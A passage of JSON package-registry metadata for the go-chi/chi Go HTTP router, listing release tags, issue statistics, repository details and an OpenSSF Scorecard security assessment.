/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.132Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/golang-github-go-chi-chi?arch=source\u0026distro=debian-11\u0026repository_url=https://packages.debian.org/bullseye","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"debian-11","url":"https://packages.debian.org/bullseye","ecosystem":"debian","default":false,"packages_count":31268,"maintainers_count":0,"namespaces_count":3,"keywords_count":759,"github":"debian","metadata":{"codename":"bullseye","funded_packages_count":456},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.702Z","updated_at":"2026-08-10T05:08:02.664Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/namespaces"}},{"id":13387846,"name":"golang-github-go-chi-chi","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["universe/golang"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-05T15:52:48.409Z","latest_release_published_at":"2026-02-05T15:52:48.409Z","latest_release_number":"5.0.7-1","last_synced_at":"2026-03-05T17:09:43.158Z","created_at":"2026-02-05T15:52:48.138Z","updated_at":"2026-08-08T10:51:35.165Z","registry_url":"https://launchpad.net/ubuntu/+source/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"golang-github-go-chi-chi-dev","standards_version":"4.5.1","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"